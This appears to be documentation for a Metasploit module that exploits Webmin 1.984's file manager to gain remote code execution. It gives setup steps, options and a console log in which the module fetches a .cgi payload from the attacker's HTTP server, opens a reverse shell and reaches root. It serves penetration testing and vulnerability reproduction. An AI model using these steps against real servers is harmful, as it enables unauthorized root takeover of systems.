## Vulnerable Application

In Webmin v1.984, any authenticated low privilege user without access rights to the
File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing
file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
functionalities in the file manager.

### Setup, on Ubuntu 20.04

```
wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
sudo dpkg -i  webmin_1.984_all.deb
```

Webmin should now be installed. The credentials for the web UI will be the same as the
user that installed Webmin

## Options
### USERNAME
A specific username to authenticate as
### PASSWORD
A specific password to authenticate with

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/webmin_file_manager_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a session as the `root` user.

## Scenarios
### Webmin 1.984, on Ubuntu 20.04

```
msf6 > exploit/linux/http/webmin_file_manager_rce
[*] Using exploit/linux/http/webmin_file_manager_rce
msf6 exploit(linux/http/webmin_file_manager_rce) > set password notpassword
password => notpassword
msf6 exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(linux/http/webmin_file_manager_rce) > set username msfuser
username => msfuser
msf6 exploit(linux/http/webmin_file_manager_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] Request 'GET /tmBFT82mvsHD.cgi'
[*] Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```
